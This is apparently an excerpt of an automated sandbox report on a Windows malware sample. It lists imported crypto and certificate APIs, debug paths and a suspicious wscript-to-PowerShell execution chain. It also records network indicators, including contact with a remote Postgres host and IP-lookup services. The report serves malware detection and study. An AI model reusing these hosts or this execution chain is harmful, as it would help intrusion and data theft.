    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9B6E0 EVP_MD_CTX_new,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,CRYPTO_malloc,RAND_bytes_ex,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_CTX_ctrl,EVP_PKEY_CTX_ctrl,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,EVP_MD_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,46_2_00007FFA2CE9B6E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE736D0 CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE736D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE876D0 CRYPTO_free,46_2_00007FFA2CE876D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE556D0 CRYPTO_zalloc,46_2_00007FFA2CE556D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE236C0 X509_VERIFY_PARAM_get0_peername,BIO_get_shutdown,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,46_2_00007FFA2CE236C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE27870 CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,CRYPTO_free,memset,CRYPTO_free,46_2_00007FFA2CE27870
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B870 CRYPTO_free,46_2_00007FFA2CE8B870
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9985F memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,memcmp,memcmp,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CE9985F
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE29850 ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_decapsulate,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,46_2_00007FFA2CE29850
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE35840 i2d_PUBKEY,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,d2i_PUBKEY,EVP_PKEY_free,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,46_2_00007FFA2CE35840
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE43840 OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE43840
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE33820 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,CRYPTO_realloc,46_2_00007FFA2CE33820
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE75190 BIO_free,CRYPTO_free,46_2_00007FFA2CE75190
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4D140 CRYPTO_free,CRYPTO_malloc,46_2_00007FFA2CE4D140
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9B140 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,EVP_PKEY_free,EVP_PKEY_get_size,ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,46_2_00007FFA2CE9B140
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE39120 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,46_2_00007FFA2CE39120
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE71127 CRYPTO_realloc,46_2_00007FFA2CE71127
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5D100 CRYPTO_free,46_2_00007FFA2CE5D100
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE7F0F0 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,BIO_clear_flags,BIO_set_flags,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,46_2_00007FFA2CE7F0F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE910E0 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CE910E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE550D0 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,46_2_00007FFA2CE550D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA92A0 EVP_MD_get_size,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,46_2_00007FFA2CEA92A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE6F290 CRYPTO_realloc,46_2_00007FFA2CE6F290
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE25240 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE25240
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2321D X509_VERIFY_PARAM_get0_peername,ASYNC_WAIT_CTX_get_status,BIO_clear_flags,BIO_set_init,CRYPTO_free,CRYPTO_zalloc,BIO_set_init,BIO_set_data,BIO_clear_flags,X509_VERIFY_PARAM_get0_peername,BIO_set_shutdown,BIO_push,BIO_set_next,BIO_up_ref,BIO_set_init,46_2_00007FFA2CE2321D
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE63220 CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE63220
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE41210 BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,46_2_00007FFA2CE41210
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73200 OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_delete,CRYPTO_free,46_2_00007FFA2CE73200
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE551E0 BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,BN_dup,CRYPTO_strdup,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,46_2_00007FFA2CE551E0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE751D0 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,ERR_new,ERR_set_debug,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_CIPHER_is_a,EVP_MD_up_ref,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_free,ERR_new,ERR_set_debug,ERR_set_error,BIO_free,CRYPTO_free,46_2_00007FFA2CE751D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE213A0 CRYPTO_free,46_2_00007FFA2CE213A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE993A0 ERR_new,ERR_set_debug,CRYPTO_clear_free,46_2_00007FFA2CE993A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE73380 CRYPTO_free,46_2_00007FFA2CE73380
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE9B370 ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,CRYPTO_malloc,RAND_bytes_ex,EVP_MD_CTX_new,OBJ_nid2sn,EVP_get_digestbyname,EVP_DigestInit,EVP_DigestUpdate,EVP_DigestUpdate,EVP_DigestFinal_ex,EVP_MD_CTX_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,CRYPTO_clear_free,EVP_MD_CTX_free,46_2_00007FFA2CE9B370
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE2D360 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_free,46_2_00007FFA2CE2D360
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE37360 CRYPTO_free_ex_data,CRYPTO_THREAD_lock_free,CRYPTO_free,46_2_00007FFA2CE37360
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CEA5360 ERR_new,i2d_PUBKEY,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,46_2_00007FFA2CEA5360
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4D310 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4D310
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE492F0 CRYPTO_realloc,memcpy,46_2_00007FFA2CE492F0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5B2D0 CRYPTO_free,46_2_00007FFA2CE5B2D0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE432C0 CRYPTO_THREAD_write_lock,OPENSSL_LH_insert,OPENSSL_LH_retrieve,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,46_2_00007FFA2CE432C0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE5B4B0 CRYPTO_zalloc,46_2_00007FFA2CE5B4B0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B4A0 CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE8B4A0
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE4D440 CRYPTO_free,CRYPTO_zalloc,OBJ_txt2nid,CONF_parse_list,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,memcpy,CRYPTO_free,CRYPTO_free,46_2_00007FFA2CE4D440
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE91430 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,46_2_00007FFA2CE91430
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE8B420 CRYPTO_free,46_2_00007FFA2CE8B420
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E3C0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA3310E3C0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3311C300 BCryptGenRandom,51_2_00007FFA3311C300
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313E270 memcmp,memcmp,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError,51_2_00007FFA3313E270
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33123110 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA33123110
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA331231A0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA331231A0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA330F1180 CryptAcquireContextW,CryptImportKey,CryptReleaseContext,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,51_2_00007FFA330F1180
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313E7A0 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,51_2_00007FFA3313E7A0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313B4E0 memset,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA3313B4E0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E4F0 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,51_2_00007FFA3310E4F0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3311C4D0 memset,BCryptGenRandom,51_2_00007FFA3311C4D0
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E570 CryptHashData,51_2_00007FFA3310E570
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3310E580 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,51_2_00007FFA3310E580
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313BA86 wcschr,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcsncmp,wcschr,CertOpenStore,GetLastError,free,free,CryptStringToBinaryW,free,CertFindCertificateInStore,free,CertFreeCertificateContext,CertCloseStore,free,fseek,ftell,fread,fclose,fseek,fclose,MultiByteToWideChar,PFXImportCertStore,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,strchr,strncmp,strncmp,strncmp,strncmp,strncmp,strtol,strchr,strncmp,strncmp,strncmp,strchr,CertFreeCertificateContext,free,51_2_00007FFA3313BA86
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA33123090 CryptAcquireContextW,CryptCreateHash,CryptReleaseContext,51_2_00007FFA33123090
    Source: C:\Windows\System32\console_zero.exeCode function: 51_2_00007FFA3313DE50 CertGetNameStringW,CertFindExtension,CryptDecodeObjectEx,free,CertFreeCertificateContext,51_2_00007FFA3313DE50
    Source: C:\Windows\System32\console_zero.exeCode function: -----BEGIN PUBLIC KEY-----51_2_00007FFA3313FA60
    Source: console_zero.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: C:\Windows\System32\console_zero.exeCode function: mov dword ptr [rbp+04h], 424D53FFh51_2_00007FFA33124930
    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.17:49726 version: TLS 1.2
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: vcruntime140d.amd64.pdb,,, source: vcruntime140d.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: svchost.exe, 0000002E.00000002.2378540668.00007FFA243AB000.00000002.00000001.01000000.0000001B.sdmp, libcrypto-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: usvc.dat.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: svchost.exe, 0000002E.00000002.2389293768.00007FFA2CF18000.00000002.00000001.01000000.00000017.sdmp, libpq.dll.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: console_zero.exe, 00000033.00000002.2226266010.00007FFA5112F000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: ucrtbased.pdb source: ucrtbased.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdb source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
    Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: svchost.exe, 0000002E.00000002.2387227676.00007FFA2CEB0000.00000002.00000001.01000000.00000018.sdmp, libssl-3-x64.dll.31.dr, usvc.dat.31.dr
    Source: Binary string: PrintUI.pdbGCTL source: xcopy.exe, 00000019.00000002.1799318566.000001A4BEA1C000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.1832292058.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe, 0000001F.00000002.2221772024.00007FF78DE32000.00000002.00000001.01000000.00000010.sdmp, printui.exe.25.dr
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA4185014C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,46_2_00007FFA4185014C
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA41850008 FindClose,FindFirstFileExW,GetLastError,46_2_00007FFA41850008

    Software Vulnerabilities

    barindex
    Suspicious execution chain found
    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: global trafficTCP traffic: 192.168.2.17:49730 -> 20.71.50.126:5432
    Source: global trafficHTTP traffic detected: GET /api/timezone/Etc/UTC HTTP/1.1Host: worldtimeapi.orgAccept: */*
    Source: Joe Sandbox ViewIP Address: 213.188.196.246 213.188.196.246
    Source: Joe Sandbox ViewIP Address: 213.188.196.246 213.188.196.246
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
    Source: Joe Sandbox ViewJA3 fingerprint: bd0bf25947d4a37404f0424edf4db9ad
    Source: unknownDNS query: name: ipinfo.io
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Windows\System32\svchost.exeCode function: 46_2_00007FFA2CE61C20 BIO_ADDR_clear,BIO_ADDR_clear,ERR_set_mark,BIO_recvmmsg,ERR_peek_last_error,BIO_err_is_non_fatal,ERR_pop_to_mark,ERR_clear_last_mark,ERR_clear_last_mark,46_2_00007FFA2CE61C20
    Source: global trafficHTTP traffic detected: GET /api/timezone/Etc/UTC HTTP/1.1Host: worldtimeapi.orgAccept: */*
    Source: global trafficDNS traffic detected: DNS query: ipinfo.io
    Source: global trafficDNS traffic detected: DNS query: worldtimeapi.org
    Source: global trafficDNS traffic detected: DNS query: universalsqlserver.postgres.database.azure.com
    Source: svchost.exe, 00000003.00000002.2339567614.00000150FCA64000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
    Source: edb.log.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/advqtdv6t35gmqvdg3dzxo4krmzq_117.0.5938.149/117.0.5
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
    Source: qmgr.db.3.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
    Source: edb.log.3.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
    Source: svchost.exe, 0000002E.00000002.2306483829.0000000064953000.00000008.00000001.01000000.0000001C.sdmp, usvc.dat.31.drString found in binary or memory: http://mingw-w64.sourceforge.net/X
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: svchost.exe, 0000002E.00000002.2347123421.00000224C242B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000002E.00000002.2394341206.00007FFA41891000.00000002.00000001.01000000.00000015.sdmp, console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe.31.dr, x338625.dat.31.dr, usvc.dat.31.drString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTC
    Source: console_zero.exe, 00000033.00000000.2196558766.00007FF7834CD000.00000002.00000001.01000000.0000001E.sdmp, console_zero.exe.31.dr, usvc.dat.31.drString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain;
    Source: console_zero.exe, 00000033.00000002.2221368650.000001E28035C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://worldtimeapi.org/api/timezone/Etc/UTCnB
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF588000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: svchost.exe, 00000009.00000002.1368820099.000001DEFEA13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.bingmapsportal.com
    Source: svchost.exe, 0000002E.00000002.2339387487.00000000682A4000.00000008.00000001.01000000.00000019.sdmp, libintl-9.dll.31.dr, usvc.dat.31.drString found in binary or memory: http://www.gnu.org/licenses/
    Source: console_zero.exeString found in binary or memory: http://www.zlib.net/
    Source: console_zero.exe, 00000033.00000002.2226412628.00007FFA51137000.00000002.00000001.01000000.0000001A.sdmp, zlib1.dll.31.dr, usvc.dat.31.drString found in binary or memory: http://www.zlib.net/D
    Source: powershell.exe, 00000022.00000002.1899492113.000001C7BF361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000022.00000002.1998067590.000001C7CF3D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: console_zero.exeString found in binary or memory: https://curl.se/
    Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/V
    Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/alt-svc.html
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/copyright.html
    Source: console_zero.exe, 00000033.00000002.2225813766.00007FFA33166000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/copyright.htmlD
    Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/hsts.html
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/hsts.html#
    Source: console_zero.exe, console_zero.exe, 00000033.00000002.2225221333.00007FFA33147000.00000002.00000001.01000000.00000016.sdmp, libcurl.dll.31.dr, usvc.dat.31.drString found in binary or memory: https://curl.se/docs/http-cookies.html
    Source: console_zero.exeString found in binary or memory: https://curl.se/docs/http-cookies.html#
    Source: svchost.exe, 00000009.00000003.1368400658.000001DEFEA57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
    Source: svchost.exe, 00000009.00000003.1368321157.000001DEFEA5A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368140177.000001DEFEA62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369086811.000001DEFEA81000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.1368376183.000001DEFEA41000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1369032766.000001DEFEA65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
